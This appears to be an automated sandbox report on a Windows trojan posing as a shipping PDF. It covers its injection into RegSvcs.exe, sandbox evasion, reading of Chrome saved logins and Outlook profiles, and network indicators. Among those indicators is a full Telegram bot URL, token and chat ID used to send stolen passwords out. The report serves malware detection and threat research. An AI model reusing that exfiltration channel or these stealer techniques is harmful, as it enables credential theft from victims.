          Source: Possible double extension: pdf.exe | Static PE information: Shipment Document BL,INV and packing list.pdf.exe
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | API/Special instruction interceptor: Address: A6DF34
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352976428.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353487685.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352997642.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358453034.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353512252.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE^(
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 9563
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
          Source: Shipment Document BL,INV and packing list.pdf.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352976428.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353487685.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352997642.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358453034.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353512252.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mcupdate.exe

          Stealing of Sensitive Information

          Source: Yara match | File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: Yara match | File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: Yara match | File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: Yara match | File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: Yara match | File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: Yara match | File source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          ATT&CK matrix, techniques listed per tactic (a leading number is the match count the report attaches to that technique):

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
          Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
          Privilege Escalation: 212 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
          Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 11 Virtualization/Sandbox Evasion; 212 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Compile After Delivery
          Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: 21 Security Software Discovery; 1 Process Discovery; 11 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; 113 System Information Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: 1 Email Collection; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Command and Control: 1 Web Service; 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
          Source | Detection | Scanner | Label | Link
          Shipment Document BL,INV and packing list.pdf.exe | 50% | ReversingLabs | Win32.Trojan.AutoitInject |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          http://api.telegram.orgX | 0% | Avira URL Cloud | safe |


          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          reallyfreegeoip.org | 104.21.112.1 | true | false | | high
          api.telegram.org | 149.154.167.220 | true | false | | high
          checkip.dyndns.com | 132.226.8.169 | true | false | | high
          checkip.dyndns.org | unknown | unknown | false | | high

          Name | Malicious | Antivirus Detection | Reputation
          https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
          https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 | false | | high
          http://checkip.dyndns.org/ | false | | high
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://reallyfreegeoip.orgX | RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://api.telegram.org | RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://crl.entrust.net/server1.crl0 | RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://api.telegram.org/bot | RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://api.telegram.orgX | RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://ocsp.entrust.net03 | RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://reallyfreegeoip.org/xml/8.46.123.189X | RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://www.diginotar.nl/cps/pkioverheid0 | RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://checkip.dyndns.org | RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.0000000002096000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632 | RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://checkip.dyndns.org/q | Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
          http://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://checkip.dyndns.org/X | RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://checkip.dyndns.com | RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://api.telegram.org | RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://ocsp.entrust.net0D | RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.879714743.0000000002021000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://secure.comodo.com/CPS0 | RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://checkip.dyndns.comX | RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://checkip.dyndns.orgX | RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://crl.entrust.net/2048ca.crl0 | RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://api.telegram.org/bot-/sendDocument?chat_id= | Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
          https://reallyfreegeoip.org/xml/ | Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
          149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false
          104.21.112.1 | reallyfreegeoip.org | United States | | 13335 | CLOUDFLARENETUS | false
          132.226.247.73 | unknown | United States | | 16989 | UTMEMUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1640472
Start date and time: 2025-03-17 11:08:42 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Shipment Document BL,INV and packing list.pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/2@5/3
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
06:09:36 | API Interceptor | 10208788x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | sryxen-built.exe | Get hash | malicious | Unknown | Browse |
149.154.167.220 | HSBC01703025_PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | QUOTATION#0033546.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | Teklif Talebi #U0130hale No-14990_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | BOM N012-001 231109.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | Purchase Order.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | shipment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | SpotifyStartupTask.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
149.154.167.220 | Crack2025.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
104.21.112.1 | #$43557.exe | Get hash | malicious | FormBook | Browse | www.nolae-eu.shop/11jg/
104.21.112.1 | BID_TERMS.EXE.exe | Get hash | malicious | FormBook | Browse | www.meshki-co-uk.shop/mzlg/
104.21.112.1 | SfF8tFQ11f.exe | Get hash | malicious | Unknown | Browse | cpvnxker.xyz/headimage.jpg
104.21.112.1 | Urgent Purchase Order.vbe | Get hash | malicious | FormBook | Browse | www.rbopisalive.cyou/6m32/
104.21.112.1 | CQDNwLUdY4.exe | Get hash | malicious | FormBook | Browse | www.rbopisalive.cyou/2dxw/
104.21.112.1 | sY8Sfsplzf.exe | Get hash | malicious | FormBook | Browse | www.enoughmoney.online/z9gb/?TF-P7=zR3cIyonFbUCfX4wpKNWKHtg5/zg1+YcnXRNJ+yYPjA6661hsBw23FkDfEgtp7rlWUxdaFu+U4x0i75BG7d41DR1Eot6cYC6DrNKmQYa+SmymwWTrA==&Pv5=thT0rvC
104.21.112.1 | gbdXRnNKkm.exe | Get hash | malicious | FormBook | Browse | www.rbopisalive.cyou/a669/
104.21.112.1 | JOB NO. AIQ8478.bat.exe | Get hash | malicious | Lokibot | Browse | touxzw.ir/sccc/five/fre.php
104.21.112.1 | jzqc1V4NqB.exe | Get hash | malicious | FormBook | Browse | www.rbopisalive.cyou/a669/?WBuDj=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9qlITGUdXxZLx5IMa8uxv5i9osOS22A==&Jzwht=FNiD
104.21.112.1 | CP07E1clp1.exe | Get hash | malicious | FormBook | Browse | www.fz977.xyz/406r/
132.226.247.73 | BANK SLIP-CTM PDA.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | BOM N012-001 231109.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | iCgb4kAWFh.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.247.73 | CloudServices.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.247.73 | QUOTATION_MARQUOTE312025PDF.scr.exe | Get hash | malicious | MSIL Logger | Browse | checkip.dyndns.org/
132.226.247.73 | SHIPPING DOCS.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | SOA FEB 2025.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.247.73 | DON.ps1 | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.247.73 | INV000001203.scr | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | Statement FEB 2025pdf.com.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | HSBC01703025_PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.96.1
reallyfreegeoip.org | BANK SLIP-CTM PDA.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.32.1
reallyfreegeoip.org | QUOTATION#0033546.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.16.1
reallyfreegeoip.org | Teklif Talebi #U0130hale No-14990_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.96.1
reallyfreegeoip.org | BOM N012-001 231109.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1
reallyfreegeoip.org | Purchase Order.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.64.1
reallyfreegeoip.org | PT Inquiry.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.32.1
reallyfreegeoip.org | DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1
reallyfreegeoip.org | shipment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.112.1
reallyfreegeoip.org | order confirmation.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.16.1
api.telegram.org | sryxen-built.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
api.telegram.org | HSBC01703025_PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | QUOTATION#0033546.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | Teklif Talebi #U0130hale No-14990_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | BOM N012-001 231109.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | Purchase Order.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | shipment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | SpotifyStartupTask.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 149.154.167.220
api.telegram.org | Crack2025.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 149.154.167.220
checkip.dyndns.com | HSBC01703025_PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | BANK SLIP-CTM PDA.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | QUOTATION#0033546.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | Teklif Talebi #U0130hale No-14990_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | BOM N012-001 231109.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | Purchase Order.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | PT Inquiry.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | shipment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | order confirmation.exe | Get hash | malicious | Snake Keylogger | Browse | 158.101.44.242
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | sryxen-built.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
TELEGRAMRU | HSBC01703025_PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | QUOTATION#0033546.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | Teklif Talebi #U0130hale No-14990_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | BOM N012-001 231109.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | Purchase Order.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | shipment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe | Get hash | malicious | LummaC Stealer | Browse | 149.154.167.99
TELEGRAMRU | SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe | Get hash | malicious | LummaC Stealer | Browse | 149.154.167.99
UTMEMUS | HSBC01703025_PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
UTMEMUS | BANK SLIP-CTM PDA.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
UTMEMUS | BOM N012-001 231109.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73
UTMEMUS | DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
UTMEMUS | shipment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
UTMEMUS | CloudServices.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.8.169
UTMEMUS | CloudServices.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.8.169
UTMEMUS | CloudServices.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.8.169
UTMEMUS | iCgb4kAWFh.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73
UTMEMUS | CloudServices.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73
CLOUDFLARENETUS | CloudServices.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.64.1
CLOUDFLARENETUS | XClient.exe | Get hash | malicious | XWorm | Browse | 104.20.4.235
CLOUDFLARENETUS | https://nwsyork.lamboi.xyz/HnBTHlrQ#parts@foster-uk.com | Get hash | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | Browse | 104.16.6.189
CLOUDFLARENETUS | https://www.swpinovalab.com.br/admin/ees.php | Get hash | malicious | HTMLPhisher | Browse | 104.16.123.96
CLOUDFLARENETUS | WizClient.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 104.20.3.235
